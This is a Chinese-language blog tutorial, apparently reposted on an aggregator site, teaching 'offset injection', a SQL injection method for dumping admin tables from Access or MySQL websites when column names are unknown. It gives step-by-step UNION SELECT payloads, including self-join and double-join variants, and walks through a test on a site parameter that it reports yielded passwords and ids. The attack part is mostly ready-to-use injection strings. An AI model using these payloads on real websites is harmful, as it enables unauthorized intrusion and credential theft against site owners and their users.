偏移注入

Posted sstfy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了偏移注入相关的知识,希望对你有一定的参考价值。

应用场景

access、mysql数据库的网站存在注入,但跑不出字段名(列名)。

偏移注入步骤

  • 1.判断注入点
  • 2.order by 判断当前表的列数
    (该判断出来的列数可能等于或小于该表,在于代码查询语法有没有写死)
  • 3.联合查询猜表名
  • 4.获取目标表的列数
    (union select 1,2,3,...,* from TABLE)
  • 5.开始偏移注入(两种方法)
  • (1)传统移位(需要一定运气,可以多次偏移):
    union select 1,2,3,...,* from TABLE as a inner join TABLE as b on a.id=b.id
  • (2)新手法(成功率比第一种高,但也有瓶颈):
    union select 1,2,3,admin.*,8 from TABLE

应用条件

两种手法均需要存在注入的当前表的列数 大于 目标表的列数,越大成功率越高。
第一种手法:为了保证成功率,最好是目标表列数的2倍。另外注意注入过程中隐性显位(查看源代码)。
第二种手法:页面显位至少存在连续的 2~3位连续的数字(如果有隐性显位也算),也不一定,具体问题具体对待。

测试过程

以下测试前面3步不作记录。

第一种方式

页面显位
技术图片

隐性显位
技术图片

判断目标admin表的列数

通过 * 泛测试
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin

到16的时候页面正常显位(和22的时候一样)
技术图片

所以,admin的列数为 22-16=6
第一种偏移注入:
由上得知admin列名为6,进行偏移注入时也得偏移一个admin列数,及16-6=10
代码为 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id=b.id)
注释:
admin as a inner join admin as b on a.id=b.id 这句话的意思是将 admin表 标记为 a 也标记为 b,这样a、b两个相同的表的 id 列参数相等。inner join ... on 返回关键行。
技术图片

这样就显位得到日期,隐性显位还有密码。
技术图片

但没有账户名,可以通过增加 a.id、b.id 字段让排序重组,实现同一个地方爆出不同信息。
执行 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
技术图片

也可进行二次偏移
执行 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
二次移位再减去一个 admin表的列数。这里加了 a.id、b.id、c.id 字段,如果不加也可以执行,如果没爆出目标数据就加上进行打乱偏移字段重新查询。
技术图片

第二种方式

前面判断出 admin 列数为 6 列,且由上可知,显位数字为 3,9,13,15(包括隐性显位,同上)
技术图片

所以我们通过 在显位处 13 放置 admin.* (查询admin表的所有内容)
执行 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin
这里 admin.* 占了6个字段(即admin表的字段数)。
技术图片

直接爆出密码和id号
技术图片

同样依次替换其他几个显位数字的位置,但仍不能爆出账号名,所以此处有点鸡肋。但是如果显位数字连续,且有多个,注入时就不用传统手工方法去猜列名。

如下另外一个测试站点,显位连续 2、3、4,就可以:
技术图片
技术图片

第二种的原理
为了方便理解,直接通过mysql查询截图展示。mysql 在跨表查询中,可以把目标中的字段在存在注入的当前表中显位出来。
技术图片

end!

以上是关于偏移注入的主要内容,如果未能解决你的问题,请参考以下文章

access偏移注入*过滤了怎么办

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?

移位溢注:告别靠人品的偏移注入 (推荐)

初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段

初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段

Acces数据库注入|偏移注入